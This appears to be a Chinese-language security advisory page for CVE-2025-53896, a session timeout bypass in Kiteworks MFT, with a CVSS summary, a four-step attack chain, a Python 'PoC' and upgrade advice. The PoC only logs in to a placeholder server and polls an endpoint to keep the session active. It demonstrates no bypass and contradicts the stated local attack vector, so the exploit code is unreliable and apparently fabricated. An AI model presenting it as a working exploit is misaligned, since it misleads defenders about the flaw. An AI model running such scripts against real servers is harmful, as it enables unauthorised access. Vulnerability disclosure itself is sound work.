CVE-2025-53896 CVSS 7.1 高危

CVE-2025-53896: Kiteworks MFT 会话超时绕过漏洞

披露日期: 2025-11-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-53896

漏洞类型

会话管理/身份认证绕过

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kiteworks MFT

漏洞概述

Kiteworks MFT 9.1.0之前的版本存在会话超时绕过漏洞。攻击者利用本地低权限访问，通过特定条件触发会话不超时机制，绕过安全超时限制，可能导致会话被劫持或未授权访问敏感文件传输功能。

技术细节

漏洞源于Kiteworks MFT会话管理模块的逻辑缺陷。在特定条件下，系统未正确执行会话超时检查，允许已过期会话持续活跃。攻击者可通过本地访问，利用低权限账户触发该条件，延长会话生命周期至任意时长。

攻击链分析

STEP 1

攻击者获取Kiteworks MFT低权限账户

STEP 2

通过本地访问触发会话管理模块的特定条件

STEP 3

会话超时机制被绕过，允许持续活跃

STEP 4

攻击者利用未超时会话访问敏感功能或劫持其他用户会话

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

target = 'https://vulnerable-server.com'
payload = {
    'username': 'attacker',
    'password': 'password123'
}

session = requests.Session()
response = session.post(f'{target}/login', data=payload)

# 保持会话活跃
for i in range(10):
    session.get(f'{target}/api/active')
    time.sleep(60)

# 验证会话仍活跃
final_check = session.get(f'{target}/api/check')
print('Session bypassed' if final_check.status_code == 200 else 'Failed')

影响范围

Kiteworks MFT < 9.1.0

防御指南

临时缓解措施

立即升级Kiteworks MFT至9.1.0，同时启用会话活动日志监控，检测异常长的会话行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表